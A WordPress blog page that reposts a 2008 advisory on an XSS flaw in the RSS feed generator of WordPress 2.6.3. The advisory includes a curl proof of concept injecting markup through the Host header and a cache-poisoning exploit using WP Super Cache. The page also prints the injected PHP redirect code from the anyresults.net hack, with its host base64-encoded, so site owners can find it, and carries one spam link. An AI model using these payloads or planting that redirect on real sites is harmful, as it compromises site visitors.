WordPress <= 2.6.3 XSS Vulnerability

Due to what we consider a critical and an exploitable vulnerability in the RSS subsystem in WordPress 2.6.3 and below, WordPress has released a fix, and moved to version 2.6.5. The links to the new version and other information are available after the jump, along with the Full Disclosure Vulnerability announcement from Jeremias Reith.

===== noXSS.org Security Advisory ======
Advisory: WordPress XSS vulnerability in RSS Feed Generator
Author: Jeremias Reith <redacted>
Published: 2008/11/25
Affected: WordPress < 2.6.5
Summary
=======

WordPress prior to v2.6.5 fails to sanitize the Host header variable correctly when generating RSS feeds and is therefore prune to XSS attacks.

Web Sites running in a name based virtual hosting setup are not affected as long as they are not the default virtual host.

Moreover we only found installations running on the Apache web server to be affected.

Vulnerability Details
=====================

The function self_link() in wp-includes/feed.php is used to generate absolute URLs for the <atom:link> tag in ATOM and RSS 2.0 feeds:

function self_link() {
echo ‘http’
. ( $_SERVER[‘https’] == ‘on’ ? ’s’ : ” ) . ‘://’
. $_SERVER[‘HTTP_HOST’]
. wp_specialchars(stripslashes($

_SERVER[‘REQUEST_URI’]), 1);
}

The function does not sanitize the HTTP_HOST variable in any way but WordPress replaces all $_SERVER variables with escaped ones in wp-settings.php:

$_SERVER = add_magic_quotes($_SERVER);
In almost all setups add_magic_quotes() runs
mysql_real_escape_string() over the elements and returns the modified array. Unfortunately this escaping method is not safe in markup context.
PoC
====

The Apache web server only disallows ‘/’, ‘\’ and ‘..’ within the host header. The header can therefore contain markup making the following PoC possible:

curl -H “Host: \”> <body onload=alert(String.fromCharCode(88,83,83))>” \
http://www.example.org/blog/feed

The given example request will return (without additional newlines):

– snip –

<atom:link href=”http://\”>

<body onload=alert(String.fromCharCode(88,83,83))>

/blog/feed” rel=”self” type=”application/rss+xml” />

– snip –

The embedded JavaScript will be executed in Firefox 3.0.4 due to the triggered switch to Quirks mode.

Exploit

=======

The following exploit is a semi-stored XSS attack and has been tested with the following setup:

– Apache 2.x with IP based virtual hosting

– WordPress 2.6.3 installed in /blog/

– WP Super Cache 0.84

– Firefox 3.0.4

WP Super Cache is a popular WordPress plugin that adds static filecaching to WordPress. It greatly increases performance and is often used. It saves generated pages in the wp-content/cache directory and adds mod_rewrite rules to serve cached pages statically.

Issuing a malicious request to a vulnerable WordPress installation will lead to a file containing the XSS to be generated and placed within the document root.

Request:

curl -H “Host: \”><body onload=alert(String.fromCharCode(88,83,83))>” \

http://www.example.org/blog/feed

Generated file:

http://example.org/blog/wp-content/cache/wp-cache-#md5sum#.html

Firefox will execute the embedded JavaScript even tough the feed is

XML because the file is served as text/html.

The only missing the step is the calculation cached file’s MD5 sum.

The following code generates the MD5 checksum:

php -r ‘echo md5(”\”><body onload=alert(String.fromCharCode(88,83,83))>”.

“/blog/feed”), “\n”;’

In the default setup the MD5 sum can be generated by concatenating the

contents of HTTP_HOST and REQUEST_URI resulting in

0d2ca4617758433a7864d57493be2c5b for the given example.

This file can be accessed until the cache expiration mechanism removes

it. The default expire time is 3600 seconds.

Vendor Response

===============

2008-11-17 Reported to vendor

2008-11-17 Initial response from vendor

2008-11-25 Release of version 2.6.5

Posted in Wordpress | Leave a comment

Vote: WordPress 2.7: Project Icon

Ready? Go and take the icon survey. Voting will remain open for 48 hours from the time of this post to allow people from all time zones a chance to participate before we close the survey and make a decision (since we’d like to include the new icons in Beta 3).

fegcd5n44b

Posted in Wordpress | Tagged , | Leave a comment

What is a WordPress Blog and Should You Use WordPress?

If you are interested in blogging, you will eventually run across the name WordPress. WordPress is a very popular blogging application for many reasons, and the serious bloggers tend to go with WordPress. WordPress is powerful software not only because of the quality, but because of the ease of use. There are other blogging software applications out there, but bloggers will quickly recognize the power and benefits of using WordPress, and all of the features that come with it.

One outstanding benefit of using WordPress to create your blog is pinging. Pinging alerts the search engines every time you have placed new content on your blog. Pinging also notifies blog libraries. People use the blog libraries to direct them to the topics they want to read about. This drives traffic to your blog, and even better, it takes no time and effort on your part.

Another benefit of WordPress is you don’t have to be a blog designer to get a professional looking blog. There are hundreds of free great looking WordPress themes to fit any topic you want to pursue. Once you pick your theme, it’s advisable to get yourself a tutorial package to smoothly get your blog up and running, plus your tutorial package will save you countless hours, and a lot of frustration. After you get more familiar with WordPress, maintaining your blog will be fast and easy.

WordPress has a great plugin library that allows you to instantly add some amazing features such as image galleries, podcasting, statistics so you know how many people are visiting your site, and events calendars. The plug-ins will allow you to change the look and feel of your blog any time it suits you, and they can be installed in minutes.

These are just a few of the elements WordPress offers so you end up with a very attractive blog that is going to draw people to visit frequently and read the content that you have posted on your blog. WordPress is a powerful blogging environment that allows you the freedom to be as creative and as unique as you want to be.

If you want to make fast cash on the internet, visit us at: FastCashBlogging.com

Posted in Articles, Wordpress | Tagged , , | Leave a comment

WordPress 2.6.2 Snoopy Vulnerability

A vulnerability in the Snoopy library was announced today.  WordPress uses Snoopy to fetch the feeds shown in the Dashboard.   Although this seems to be a low risk vulnerability for WordPress users, we wanted to get an update out immediately.  2.6.3 is available for download right now.  If you don’t want to download the whole release to get the security fix, you can download the following two files and copy them over your 2.6.2 installation.

  1. wp-includes/class-snoopy.php
  2. wp-includes/version.php
Posted in Vulnerabilities | Tagged , | Leave a comment

WordPress AnyResults.net Hack – Search Engine Visits Redirecting to AnyResults.net

WordPress AnyResults.net Hack – Search Engine Visits Redirecting to AnyResults.net

Many sites that are running wordpress blogs have been hacked by a very clever and hidden PHP Injection which is redircting all requests from google, msn, live, altavista, ask, yahoo, and other search engines and redirecting it to ‘anyresults.net’ a site filled with pay-per-click ads and redirects to other landing pages. This is a very clever trick as visiting a web site either through a direct navigation type in or a bookmark does not display the problem. Only search engine visits are redirected and many site owners are delayed at discovering this problem untill they notice huge dips in traffic or revenue stats.

Many blogs and discussions on this provide very little help in finding this exploit. Some talk about a plug-in file as the colprete, some a wp-options table in the database, none of which were very helpful in this case.

If your blog is effected by this hack check your wp-blog-header.php file for the following code:

<?php \ $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa"); $ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; } if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

Remove it completely or comment it out.

This code is using a base64 value for the string ‘anyresults.net’ which made it much more difficult to find the redirect string in any of the files.

It is recommended that you upgrade all of your WordPress sites to the most current and stable version immediately. This attack is possible for any sites not running the latest version of wordpress so you can understand the urgency of upgrading wordpress sites.

While seeking solutions I discover some more good ideas on keeping your wordpress site safe on Matt Cutts blog topic: Three Tips to Protect Your WordPress Installation.

Posted in Wordpress | Tagged , , , | Leave a comment